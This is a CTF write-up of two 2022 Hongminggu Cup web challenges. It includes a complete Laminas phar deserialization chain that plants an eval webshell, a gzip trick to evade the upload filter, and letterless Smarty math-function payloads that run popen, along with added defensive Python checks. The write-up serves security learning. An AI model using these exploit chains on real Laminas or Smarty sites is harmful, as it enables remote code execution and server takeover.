2022 Hongminggu Cup web

Fan website

The challenge gave a hint that it was related to laminas.
Scanning the directory yields the source code.
Auditing the code shows that the application has an album route, and there is only one controller: /module/Album/src/Controller/AlbumController.php

It contains several handler functions, including ones that upload and delete files.
But the upload filter uses a whitelist, so it is not easy to bypass.
And the file content must not contain <? or HALT_COMPILER.
This is a bit of a giveaway: why filter HALT_COMPILER, which is related to phar, for no reason?
Searching online for vulnerabilities in this component turned up a deserialization vulnerability, https://xz.aliyun.com/t/8975. So the plan is simple: upload a phar file, then delete it, which triggers deserialization when unlink is called on it. But the content must be larger than 3kb, so add str_repeat('123',1000000).

<?php

namespace Laminas\View\Resolver{
	class TemplateMapResolver{
		protected $map = ["setBody"=>"system"];
	}
}

namespace Laminas\View\Renderer{
	class PhpRenderer{
		private $__helpers;
		function __construct(){
			$this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();
		}
	}
}

namespace Laminas\Log\Writer{
	abstract class AbstractWriter{
	}

	class Mail extends AbstractWriter{
		// the command to execute
		protected $eventsToMail = ["echo '<?php eval(\$_POST[1]);?>' > /var/www/public/a.php"];
		protected $subjectPrependText = null;
		protected $mail;
		function __construct(){
			$this->mail = new \Laminas\View\Renderer\PhpRenderer();
		}
	}
}

namespace Laminas\Log{
	class Logger{
		protected $writers;
		function __construct(){
			$this->writers = [new \Laminas\Log\Writer\Mail()];
		}
	}
}

namespace{
	$a = new \Laminas\Log\Logger();
	$phar = new Phar("shell.phar"); // the extension must be phar
	$phar->startBuffering();
	$phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
	$phar->setMetadata($a); // store the custom object as meta-data in the manifest
	$phar->addFromString("a", str_repeat('123',1000000)); // add a file to the archive (padding so the phar exceeds 3kb)
	// the signature is computed automatically
	$phar->stopBuffering();
}
?>

With the chain built, one problem remains: bypassing the filter on <? and __HALT_COMPILER.
An article found online, https://www.wangan.com/p/7fygf7a00f0fd793, gives the trick.
Gzip the generated phar file, then change the suffix to png. The filter only inspects the raw upload, while PHP's phar stream wrapper transparently decompresses a gzip-compressed archive.
Once the upload completes, note the file path.
Pass phar:///var/www/public/img/00bf23e130fa1e525e332ff03dae345d.png as the file to delete.

After connecting with AntSword, the flag is obtained.
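The bypass above works because the upload filter looks at the bytes as uploaded, while the phar wrapper decompresses gzip on the fly. As an added defensive check (Python, not code from the writeup or from laminas), the following inspects the decompressed layer too and insists on a real image header; the magic-byte table and the sample stub are constructed for illustration.

```python
import gzip
import zlib

# Strings the challenge's upload filter blocks in the raw file body.
PHAR_MARKERS = (b"__HALT_COMPILER", b"<?")

# Constructed magic-byte table for the image types an upload whitelist typically accepts.
IMAGE_MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"GIF87a": "gif",
               b"GIF89a": "gif", b"\xff\xd8\xff": "jpeg"}

# Constructed sample: the stub from the writeup plus its padding, raw and gzip-compressed.
SAMPLE_STUB = b"GIF89a<?php __HALT_COMPILER();?>" + b"123" * 1000
SAMPLE_PACKED = gzip.compress(SAMPLE_STUB)


def naive_content_filter(data: bytes) -> bool:
    """Mirror of the challenge's check: only the bytes exactly as uploaded are inspected."""
    return not any(m in data for m in PHAR_MARKERS)


def _layers(data: bytes):
    """Yield the raw bytes, plus the decompressed body when the upload is a gzip stream."""
    yield "raw", data
    if data[:2] == b"\x1f\x8b":  # gzip magic
        try:
            yield "gzip", gzip.decompress(data)
        except (OSError, EOFError, zlib.error):
            pass


def find_phar_markers(data: bytes) -> list:
    """Return 'layer:marker' for each phar marker found in the raw or decompressed body."""
    hits = []
    for layer, blob in _layers(data):
        hits.extend(f"{layer}:{m.decode()}" for m in PHAR_MARKERS if m in blob)
    return hits


def image_type(data: bytes):
    """Image type implied by the magic bytes, or None when the header is not an image."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def accept_upload(data: bytes) -> bool:
    """Accept only a real image header with no phar marker at any layer."""
    return image_type(data) is not None and not find_phar_markers(data)
```

Note that the raw stub passes the magic-byte check on its own because of the GIF89a prefix, so both checks are needed: the marker scan catches the raw phar and the header check catches the gzip-wrapped one.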

Smarty_calculator

Scanning the backend yields the source code. The challenge name gives away what is being tested: the Smarty template engine for PHP.
After searching, I found the related CVE, CVE-2021-29454. After studying Smarty's math function for a while: it evaluates an expression passed in as {math equation="(( x + y ) / z )" x=2 y=10 z=2}.

The source code also contains the related file src/Smarty/plugins/function.math.php, and an eval call is found in it. So the challenge is about the command execution vulnerability. Reading upward from the eval, the content of equation cannot contain backticks or $, and the number of left parentheses must match the number of right ones. In addition, a regular-expression match is performed.
Roughly: no hexadecimal, and nothing beginning with a letter; otherwise the equation enters this foreach loop.
Further down there is another loop: if a parameter name in the incoming content is not equation, format or assign, a replacement is performed.
So if we avoid both loops, the incoming content is spliced together and put into eval.
It is natural to think of RCE without numbers or letters. That way the payload is not matched by the regular expression, and the other loop is also bypassed (there are no other letters, and $param has only one key).
I wrote a fairly complete script for generating such payloads without numbers or letters before: https://blog.csdn.net/miuzzx/article/details/109143413. Just use that.
Using the OR construction, try phpinfo first.

import requests
import urllib.parse

url = "http://eci-2ze9vv2h6yb0y4183bod.cloudeci1.ichunqiu.com/"

# The equation is kept URL-encoded in the script and decoded before sending;
# '0(0).&/' | '@@@@@@@' ORs out to 'phpinfo'.
data = {'data': urllib.parse.unquote(''' {math equation="1;('%30%28%30%29%2e%26%2f'|'%40%40%40%40%40%40%40')();//" }''')}

r = requests.post(url, data=data, cookies={'login': '1'})
print(r.text)

disable_functions is set, but popen is left out, so popen can be used to execute system commands.
Blindly guess that the flag is at /flag and run the system command cp /flag a, which means constructing the PHP statement popen('cp /f* a','r').

import requests
import urllib.parse

url = "http://eci-2ze9vv2h6yb0y4183bod.cloudeci1.ichunqiu.com/"

# '0/0%.' | '@@@@@' ORs out to 'popen'; the two arguments OR out to 'cp /f* a' and 'r'.
data = {'data': urllib.parse.unquote(''' {math equation="1;('%30%2f%30%25%2e'|'%40%40%40%40%40')(('%23%30%00%00%26%00%00%21'|'%40%40%20%2f%40%2a%20%40'),('%32'|'%40'));//" }''')}

r = requests.post(url, data=data, cookies={'login': '1'})
print(r.text)

Visit /a to get the flag.
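The root cause in this challenge is filter-then-eval: the plugin deny-lists backticks, $, unbalanced parentheses and leading letters, and a payload made only of punctuation slips past all of it. Added here as a defensive example (Python, not Smarty's own code) is the alternative a fix wants: parse the equation into an AST and walk it with an allow-list, so anything that is not arithmetic over numbers, the named variables and a few math functions is rejected outright. The function allow-list is constructed for illustration and is not the plugin's exact list.

```python
import ast
import math
import operator

# Arithmetic the calculator legitimately needs; everything else is rejected at the AST level.
_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
            ast.Div: operator.truediv, ast.Mod: operator.mod}
# Constructed allow-list of functions, modelled on the kind the math plugin exposes.
_FUNCS = {"abs": abs, "round": round, "max": max, "min": min,
          "sqrt": math.sqrt, "floor": math.floor, "ceil": math.ceil,
          "sin": math.sin, "cos": math.cos, "tan": math.tan, "log": math.log}


def safe_math(equation: str, variables: dict) -> float:
    """Evaluate `equation` over numeric `variables` (x, y, z in the page's example) or raise ValueError."""
    try:
        tree = ast.parse(equation, mode="eval")  # '1;...' is already a SyntaxError here
    except SyntaxError as exc:
        raise ValueError(f"not an expression: {exc.msg}") from None

    def ev(node):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value  # string constants such as '0/0%.' fall through and are rejected
        if isinstance(node, ast.Name) and node.id in variables:
            return float(variables[node.id])
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](ev(node.left), ev(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.UAdd, ast.USub)):
            val = ev(node.operand)
            return -val if isinstance(node.op, ast.USub) else val
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in _FUNCS and not node.keywords):
            return _FUNCS[node.func.id](*(ev(arg) for arg in node.args))
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    return ev(tree)


def is_rejected(equation: str, variables: dict = None) -> bool:
    """True when safe_math refuses the equation."""
    try:
        safe_math(equation, variables or {})
    except ValueError:
        return True
    return False
```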


Origin blog.csdn.net/miuzzx/article/details/123663551